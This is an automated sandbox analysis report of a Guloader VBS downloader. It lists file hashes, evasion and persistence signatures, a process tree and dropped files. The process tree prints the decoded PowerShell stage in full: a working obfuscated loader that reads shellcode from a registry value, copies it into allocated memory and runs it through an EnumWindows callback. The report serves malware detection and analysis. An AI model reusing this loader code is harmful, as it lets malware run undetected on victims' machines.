Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-12-2024 20:33

General

  • Target

    JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs

  • Size

    344KB

  • MD5

    26c1961c629a942788089f89b1cac50c

  • SHA1

    935559fe62e2178e4efc45a31ab1d11488d8412c

  • SHA256

    7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9

  • SHA512

    5ca13c271e755ff13a6926a20773af65c4aa755a92f4a4e3891558675acd0738b2fcdf1873bd1545a21ebcae771275ec35ff36c866b0cd9be8970a7f11a415ce

  • SSDEEP

    1536:N64IoY2vqki1BN/cjGRhMR+ebjz9IjRmvog6nCaysWYp2IazMRAt6DziIwNFczqt:KoRyk1SXCXz99vog6jysuMRkmiIY+y

Malware Config

Signatures

  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4448
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n d i   T e t r a   P e r r a d   N d v e   A t t r u p s   E f t e r g i   B e g y n   P u r l i   B a s i   L a v v   H e a d l i   I s b n   a f a r t e r n e   T i l b a g e d a t   H i g h l y r   U n l o v e l i e   G d s k   U d s i g   S p i n c o v a   S a n k e k o   F u n d   d e n o t a t i   S i n s o p s g   Z y g o s   E m p y r e u   T o a s t e d   N o n e n   X e r o g r a p h   L a t i g    
 # P a r t r i   M u t a r o t a t   T r a l l   S e m i h i s t   Z y g o m y c e   T i g e r e n   C e n t r   S t u t   V a g t p o   C h a r m e   K y n d e l m i s   B e t r   l a s s i   P h i l i   l o v o v e r t r   M o u i l l e b r   T u b a t e b i   A f v n n e d e   T w i l i   A l c a i   L t n i n g p u l   M u c i n    
 # S l b e r n e   b i l l e d   T e l e v   V e r d e n s   C o n s e c r   A r b e j d s f o   F e r i e u g e u d   F l a m b   B r i l l e   A d z e r   T h e o r e t i   E n c h a s e   s l a n g   B o r t f    
 $ M a s t e r M i n d   =   [ c h a r ] 3 4   +   " N "   +   " t A l "   +   " l o c "   +   " a t e " + " V i "   +   " r t u a l "   +   " M e m o r y "   +   [ c h a r ] 3 4  
  
 # F i n t m a s k   R o k k e d e   C o n s i   S u b d e f i   N e p o t i s t   P u p i l   F e s t l i g h o l   F o r s t y r   P r o d u k t a n s   N e p h r a d e   R i b b o n f   I n v i o l a t e d   P u d e n t t e   M e l a n c h o   P r o e p i m e r o   S k i f t   M e r k a n t i l i   B e g y n d e l s e   C e r u l e   S o m a   K e g l e r s f r e   T a n d g l a s   O u t p a c e s c r   A a b n i n g   V a n g l    
 # D y s t o m o u s y   E i r e   C a p l i n c   S m r r   S c h a c h t s c   C o l o s t r u   N s e v r d i g e n   S e m i h i   N i t r   M o i r e s m a a p   A t e l i e r   S k o k k   P a r t i c   N o n a c   R a m i   D u c h e s s e    
 # F i n g e r s p i d   A v l s h i n   I n c i v   P r e d e   S t a t i o   r e v i n d   K a i l y a r d e r   E l e a z a r b   P r o p i t   B a s h j   H u l s k e e    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   U n e u p h o 1  
 {  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   S l e e p E x ( i n t   B r a d y s p 0 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   G e t W i n d o w D C ( ) ;  
  
 [ D l l I m p o r t ( " n t d l l " ,   E n t r y P o i n t = $ M a s t e r M i n d ) ] p u b l i c   s t a t i c   e x t e r n   i n t   V i t r o S o l i d ( i n t   U n e u p h o 6 , r e f   I n t 3 2   B i l l e r 2 1 4 , i n t   S t r a n d f , r e f   I n t 3 2   U n e u p h o , i n t   O v e r p a i n t r , i n t   U n e u p h o 7 ) ;  
 [ D l l I m p o r t ( " D 2 s t a m p " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   P o o l S t a c k ( ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ,   E n t r y P o i n t = " E n u m W i n d o w s " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   M o r q q ( u i n t   S t r a n d f 5 , i n t   S t r a n d f 6 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S t r a n d f 1 , r e f   I n t 3 2   S t r a n d f 2 , i n t   S t r a n d f 3 ) ;  
  
 }  
 " @  
 # S e m a n t i   P r e s l i c   R a n u l a s t o   S o i r e e   U n d d r a g e   F u s s p   P l e i   S t e r n   S c o t c h w   S a c c h a r o c   F o d f s   S p a n i e l w   D e m o   H y p o f   S i a l o a n   S t o r m f a l d   F r g e   I n d e k l i m   T j e n   C h a r m   E s p i e r n   S p a t i n g s   T i g h   p o l y i m i d e p   K u e l s e p r   E r i n d   S w e l l   T i l e      
 $ U n e u p h o 3 = 0 ;  
 # R e e m i g r   T a y r   E v a n g e l i   M e c k e l i a n   t e m p e l   D i s a r r a y s   S t r a a l i n g   B a r o s m a p   E m e r g e r s   P o s e t b a s   P r e t r i   A a l a n d s k m a   O v e r t a l    
 $ U n e u p h o 9 = 1 0 4 8 5 7 6 ;  
 # N o r d m n d   F i l k a l d   S e t t e r   P r o p o s i t i   R e n s k   P r e p   M a n d a l a y   A n k r i n g s a f   S a l t i g r a   S j i p p e s o   h o r n i e r   H y g r o   D i n e r s   T r n e n   T r e m a n   G a m l i n g b n    
 $ U n e u p h o 8 = [ U n e u p h o 1 ] : : V i t r o S o l i d ( - 1 , [ r e f ] $ U n e u p h o 3 , 0 , [ r e f ] $ U n e u p h o 9 , 1 2 2 8 8 , 6 4 )  
 # U n e n v i r o   I n d l e v e r e   E f t e   O p a c o u s n   E v e n   C h a r g e r e   S a t s   R e f l   P a m o r t h o p e   u b e k v e m m   D i c t a m   T e l e g r   H i p b e r    
 $ B e g r = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ D e f o s s " ) . S a n c y p e s t i  
 # B u n d r e k o   R e k t i f   U n c o m p a t i   H a e v d o v e   O e u v r   P h o t o   S a l t c h u c k e   B o r g h e r r e n   S i k r i n g s s   D u n c h f l i s   A n i m i z e d   L i n i n g t r i   B h a v a n a d   F a v o r i   A p o t y p i c p   S v a l i n   K v a n   C y p r i   F l l e d e   I m p e   S t u d i e k o   D o s m e r e n p a   T a l l   L e v n e d   U n d e r h a a n d   S t e l l e n d e   C l u m s i n   R e h a b   C o l l   S y s t e m f   I d e a i s t i c   I m p u t a b l   G r a v i t a t    
 $ B e d r   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ B e g r . L e n g t h   /   2 )  
 # T a l e p d a g o   R u s k r e g n e n   O v e r l e w   S k i f   I n i q u i t i e   r o a d w   u d s l u   B e t r k   T o r n e s t r   L u m b a r s   P a r o n   T o r v e h a n d e   U d m a t r i   S i d a l c   M e r c e    
 F o r ( $ i = 0 ;   $ i   - l t   $ B e g r . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ B e d r [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ B e g r . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ S t e r e o 1 2 5 = 0 ;   $ S t e r e o 1 2 5   - l t   $ B e d r . c o u n t   ;   $ S t e r e o 1 2 5 + + )  
 {  
 	  
 [ U n e u p h o 1 ] : : R t l M o v e M e m o r y ( $ U n e u p h o 3 + $ S t e r e o 1 2 5 , [ r e f ] $ B e d r [ $ S t e r e o 1 2 5 ] , 1 )  
  
 }  
 [ U n e u p h o 1 ] : : M o r q q ( $ U n e u p h o 3 ,   0 )  
  
  
 "
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5o304gkt\5o304gkt.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4700
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D3C.tmp" "c:\Users\Admin\AppData\Local\Temp\5o304gkt\CSC28649895DE004713BFF08E77C3FA91F8.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1644
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
        • Checks QEMU agent file
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:4576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5o304gkt\5o304gkt.dll

    Filesize

    3KB

    MD5

    313ff667afc0a82ec7baad4e1980530f

    SHA1

    b4ee1d3a3d774157d4930be006e4b37a8e897715

    SHA256

    ea2775435eb86e7ee313369d214ba2bcd7699ff44dc207e2938b76562f2cd5e3

    SHA512

    1c1d0ed69a5c31ae28b707dab271cdfa287efb5e2d50bb1845acc0b8d58feb557de27090ad662006448ec17c8a42a6f8153397958f7e549090c91201e8dceb49

  • C:\Users\Admin\AppData\Local\Temp\RES8D3C.tmp

    Filesize

    1KB

    MD5

    aee0be896077067f6cbfed0f524b1c67

    SHA1

    b4a5dea040b8b7e440200c31965c26d3ffa4594d

    SHA256

    da306cc8b92635ddbf88e5644f9251dda48939d4fc8c7acffa71e8fb931a2b70

    SHA512

    b100747fa7398b5662a8c3991292fef83b8cc9c0f768e645aa10d94a68077d54a815c861fa04760d201fda9d4ac648a74648c429845262ed1c0ca538bae95b2e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r01nwgr0.0bf.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • \??\c:\Users\Admin\AppData\Local\Temp\5o304gkt\5o304gkt.0.cs

    Filesize

    706B

    MD5

    2f2d59ad9746f83211ab41b81f4ffb53

    SHA1

    3266d96213f29e9d3b556b124df0f617e30e6037

    SHA256

    841ca0fdae8cb9d8d1c70b96dd57ba4fd2c6df399be995b63028a9e9b218d1b9

    SHA512

    e5baea9a9115a2cd410894f140099b5c6a2acf494c1f5b6ee773ea2513b067039f4f7dffdb83ca60e7793fbb2be23b29fab1c4a5ca72844d75a77b02696ccde2

  • \??\c:\Users\Admin\AppData\Local\Temp\5o304gkt\5o304gkt.cmdline

    Filesize

    369B

    MD5

    83c600fd19c4a05e14b8dc79a7813ee1

    SHA1

    3ccdd369984fe521d431db9a81964b06d57faa40

    SHA256

    2ca0f0d1e389426b2031bd293166fa6a6071fcf538a3d1ea68f789a669a981d1

    SHA512

    bcdd33c95fda74592de65d18e295fe705b0dbca87cf4f798251fe936af5087c58fa699acd1f14cb1227bd016f4c43feede7de0760a18de64050623c6142790cc

  • \??\c:\Users\Admin\AppData\Local\Temp\5o304gkt\CSC28649895DE004713BFF08E77C3FA91F8.TMP

    Filesize

    652B

    MD5

    a4964f3a1613629a5ae59e39420d0fa6

    SHA1

    1d6f627764037377ae1c50456b08612ac59ca7c6

    SHA256

    b0d6876f6de1840511a562a72065c21f50cf1d4bffae92755d8f0b0d0eac229a

    SHA512

    cb785f5fc1ebf2e52eecbd6d0036489e241527d07bf26317b3e180b245b3d1e99903e629fd69ba064d23fc8f6c410df716a702e595430adc09e95700bc0a9a39

  • memory/588-7-0x0000000005F90000-0x0000000005FF6000-memory.dmp

    Filesize

    408KB

  • memory/588-2-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/588-6-0x0000000005EB0000-0x0000000005F16000-memory.dmp

    Filesize

    408KB

  • memory/588-17-0x0000000006080000-0x00000000063D4000-memory.dmp

    Filesize

    3.3MB

  • memory/588-18-0x00000000066D0000-0x00000000066EE000-memory.dmp

    Filesize

    120KB

  • memory/588-19-0x00000000066F0000-0x000000000673C000-memory.dmp

    Filesize

    304KB

  • memory/588-20-0x0000000007F30000-0x00000000085AA000-memory.dmp

    Filesize

    6.5MB

  • memory/588-21-0x0000000006C40000-0x0000000006C5A000-memory.dmp

    Filesize

    104KB

  • memory/588-5-0x00000000057E0000-0x0000000005802000-memory.dmp

    Filesize

    136KB

  • memory/588-4-0x0000000005880000-0x0000000005EA8000-memory.dmp

    Filesize

    6.2MB

  • memory/588-3-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/588-0-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

    Filesize

    4KB

  • memory/588-1-0x00000000050F0000-0x0000000005126000-memory.dmp

    Filesize

    216KB

  • memory/588-34-0x0000000006CA0000-0x0000000006CA8000-memory.dmp

    Filesize

    32KB

  • memory/588-36-0x0000000007A50000-0x0000000007AE6000-memory.dmp

    Filesize

    600KB

  • memory/588-37-0x00000000079E0000-0x0000000007A02000-memory.dmp

    Filesize

    136KB

  • memory/588-38-0x0000000008B60000-0x0000000009104000-memory.dmp

    Filesize

    5.6MB

  • memory/588-39-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/588-41-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/588-40-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

    Filesize

    4KB

  • memory/588-42-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/588-57-0x0000000074E70000-0x0000000075620000-memory.dmp

    Filesize

    7.7MB

  • memory/4576-51-0x0000000000400000-0x000000000062B000-memory.dmp

    Filesize

    2.2MB

  • memory/4576-43-0x0000000000E00000-0x0000000000F00000-memory.dmp

    Filesize

    1024KB